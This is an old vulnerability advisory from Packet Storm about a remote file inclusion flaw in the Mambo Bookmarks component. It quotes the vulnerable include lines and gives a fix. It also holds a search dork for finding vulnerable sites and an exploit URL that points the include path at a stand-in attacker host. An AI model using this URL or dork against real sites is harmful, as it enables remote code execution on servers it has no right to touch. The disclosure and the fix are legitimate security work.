mambobm.rfi.txt

2007-08-14T00:00:00
ID PACKETSTORM:58507
Type packetstorm
Reporter vitux
Modified 2007-08-14T00:00:00

Description

                                        
                                            `Application : Bookmarks - mambo Component  
  
URL :  
http://mamboxchange.com/frs/download.php/4274/MOS_Com_Bookmarks25-Final_a.zip  
  
Variable $mosConfig_absolute_path not sanitized: xpl works with  
register_globals=on  
in components/com_bookmarks/bookmarks_export.php on line 22,27,29  
  
$require_once( $mosConfig_absolute_path . "/includes/mambo.php" );  
$include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/'  
. $mosConfig_lang . '.php');  
$include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/english.php');  
  
Exploit:  
~~~~~~~~  
  
dork: "com_bookmarks"  
  
http://www.vuln.com/components/com_bookmarks/bookmarks_export.php?mosConfig_absolute_path=http://evilhost  
  
Fix  
~~~~  
  
Add before code:  
defined('_VALID_MOS') or die('Direct access to this location is not  
allowed.');  
  
Discovered By : vitux  
Thanks To : #indolinux@dal.net, #sunda@dal.net, #batamhacker@  
dal.net, #malanghackerlink@dal.net  
special To : donny indocom, eko indocom, ^BLaCk_BaNDitS^, urang  
subang sadaya, pokona mah kabeh lah  
mail : vitux.manis@gmail.com, pipit_subang@yahoo.com  
  
# cilacap 12th august 2007  
`